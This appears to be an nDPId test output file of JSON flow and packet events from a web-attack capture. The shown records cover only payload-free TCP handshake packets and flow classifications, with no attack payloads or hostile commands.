+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":3,"flow_last_seen":1499348056535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348056535,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LddAAD4GmAGsEAABwKgKMoqwAFDDZCKW50+nTYAQAOUKNgAAAQEICgE9D0MD5uC3"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9029,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348057789,"flow_last_seen":1499348057789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348057789,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9029,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1499348057789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348057789,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cW1AAD4GVGOsEAABwKgKMoq+AFBo3mEQAAAAAKACchD4TAAAAgQFtAQCCAoBPRB9AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":2,"flow_last_seen":1499348057790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348057790,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQir7ZkVGbaN5hEaAScSDoJwAAAgQFtAQCCAoD5uHwAT0QfQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":3,"flow_last_seen":1499348057790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348057790,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cW5AAD4GVGqsEAABwKgKMoq+AFBo3mER2ZFRnIAQAOWHLwAAAQEICgE9EH0D5uHw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348059068,"flow_last_seen":1499348059068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348059068,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1499348059068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348059068,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SJlAAD4GfTesEAABwKgKMorMAFAzNVklAAAAAKACchA0lAAAAgQFtAQCCAoBPRG8AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9042,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":2,"flow_last_seen":1499348059069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348059069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQisz9Lu2rMzVZJqAScSBjgQAAAgQFtAQCCAoD5uMwAT0RvAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":3,"flow_last_seen":1499348059069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348059069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SJpAAD4GfT6sEAABwKgKMorMAFAzNVkm\/S7trIAQAOUCiAAAAQEICgE9Eb0D5uMw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9050,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348060393,"flow_last_seen":1499348060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060393,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9050,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1499348060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348060393,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80ItAAD4G9USsEAABwKgKMoraAFD\/pcOMAAAAAKACchD8YgAAAgQFtAQCCAoBPRMHAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9051,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":2,"flow_last_seen":1499348060393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348060393,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQitr3giqS\/6XDjaAScSDyygAAAgQFtAQCCAoD5uR7AT0TBwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":3,"flow_last_seen":1499348060394,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348060394,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00IxAAD4G9UusEAABwKgKMoraAFD\/pcON94Iqk4AQAOWR0QAAAQEICgE9EwgD5uR7"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348061684,"flow_last_seen":1499348061684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348061684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1499348061684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348061684,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8R+ZAAD4GfeqsEAABwKgKMoroAFA+FlOsAAAAAKACchAsggAAAgQFtAQCCAoBPRRKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":2,"flow_last_seen":1499348061684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348061684,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiuhWb4DgPhZTraAScSBsbAAAAgQFtAQCCAoD5uW+AT0USgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":3,"flow_last_seen":1499348061685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348061685,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0R+dAAD4GffGsEAABwKgKMoroAFA+FlOtVm+A4YAQAOULdAAAAQEICgE9FEoD5uW+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348064243,"flow_last_seen":1499348064243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348064243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1499348064243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348064243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Y\/tAAD4GYdWsEAABwKgKMosCAFBtqHUxAAAAAKACchDY0AAAAgQFtAQCCAoBPRbKAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9084,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":2,"flow_last_seen":1499348064243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348064243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiwKN0\/hjbah1MqAScSBnUwAAAgQFtAQCCAoD5ug+AT0WygEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":3,"flow_last_seen":1499348064244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348064244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Y\/xAAD4GYdysEAABwKgKMosCAFBtqHUyjdP4ZIAQAOUGWwAAAQEICgE9FsoD5ug+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348065546,"flow_last_seen":1499348065546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348065546,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1499348065546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348065546,"pkt":"ABm5CmnxAMGxFOsxCABFAAA882RAAD4G0musEAABwKgKMosQAFA77ut0AAAAAKACchCS8wAAAgQFtAQCCAoBPRgQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":2,"flow_last_seen":1499348065547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348065547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQixCTY4b2O+7rdaAScSCMDQAAAgQFtAQCCAoD5umEAT0YEAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":3,"flow_last_seen":1499348065547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348065547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA082VAAD4G0nKsEAABwKgKMosQAFA77ut1k2OG94AQAOUrFQAAAQEICgE9GBAD5umE"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348068136,"flow_last_seen":1499348068136,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348068136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1499348068136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348068136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f2xAAD4GRmSsEAABwKgKMosqAFAaVGX7AAAAAKACchA3ZgAAAgQFtAQCCAoBPRqXAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":2,"flow_last_seen":1499348068136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348068136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiyoM4+ekGlRl\/KAScSBTywAAAgQFtAQCCAoD5uwLAT0alwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":3,"flow_last_seen":1499348068136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348068136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f21AAD4GRmusEAABwKgKMosqAFAaVGX8DOPnpYAQAOXy0gAAAQEICgE9GpcD5uwL"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348069426,"flow_last_seen":1499348069426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348069426,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1499348069426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348069426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86kVAAD4G24qsEAABwKgKMos4AFDyvfGfAAAAAKACchDSBgAAAgQFtAQCCAoBPRvaAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9126,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":2,"flow_last_seen":1499348069426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348069426,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiziWvrte8r3xoKAScSCPkwAAAgQFtAQCCAoD5u1OAT0b2gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":3,"flow_last_seen":1499348069427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348069427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06kZAAD4G25GsEAABwKgKMos4AFDyvfGglr67X4AQAOUumwAAAQEICgE9G9oD5u1O"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348070791,"flow_last_seen":1499348070791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070791,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
